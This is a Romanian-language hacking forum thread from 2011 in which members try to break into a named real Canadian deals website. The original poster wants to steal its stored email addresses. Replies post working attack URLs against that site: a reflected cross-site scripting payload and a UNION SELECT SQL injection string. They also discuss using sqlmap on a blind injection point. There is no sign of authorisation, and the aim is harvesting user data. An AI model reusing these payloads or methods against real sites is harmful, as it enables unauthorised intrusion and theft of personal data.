malsploit Posted December 17, 2011 Report Share Posted December 17, 2011 Canadian Deals Community - PriceNetwork.ca'Am incercat sa exploatez sqli, dar nu a mers.Sqlmap nu crede ca este sqli.Havij nu am folosit, ca sunt baiat mare.Totusi cred ca este vulnerabil.Eroarea apare in texarea.* Quote Link to comment Share on other sites More sharing options...
symboss Posted December 17, 2011 Report Share Posted December 17, 2011 (edited) E blind,are si xss http://www.pricenetwork.ca/showthread.php?threadid=322965%3E%3Cscript%3Ealert(/xss/)%3C/script%3E Edited December 17, 2011 by symboss Quote Link to comment Share on other sites More sharing options...
malsploit Posted December 17, 2011 Author Report Share Posted December 17, 2011 mai incerc cu sqlmap.Sunt informatii multe si relativ valoroase pe acolo(mailuri) Quote Link to comment Share on other sites More sharing options...
DotA Posted December 18, 2011 Report Share Posted December 18, 2011 E blind Quote Link to comment Share on other sites More sharing options...
denjacker Posted December 18, 2011 Report Share Posted December 18, 2011 http://www.pricenetwork.ca/article.php?id=22+and+1=2+&page=5+union+select+1,version(),3,4,5,6,7,8,9,10,11-- Quote Link to comment Share on other sites More sharing options...
malsploit Posted December 18, 2011 Author Report Share Posted December 18, 2011 ai reusit sa extragi ceva? Quote Link to comment Share on other sites More sharing options...
denjacker Posted December 18, 2011 Report Share Posted December 18, 2011 Nu ma amestec mai departe. No me gusta .. Quote Link to comment Share on other sites More sharing options...
malsploit Posted December 18, 2011 Author Report Share Posted December 18, 2011 *pana acum e bine.... Quote Link to comment Share on other sites More sharing options...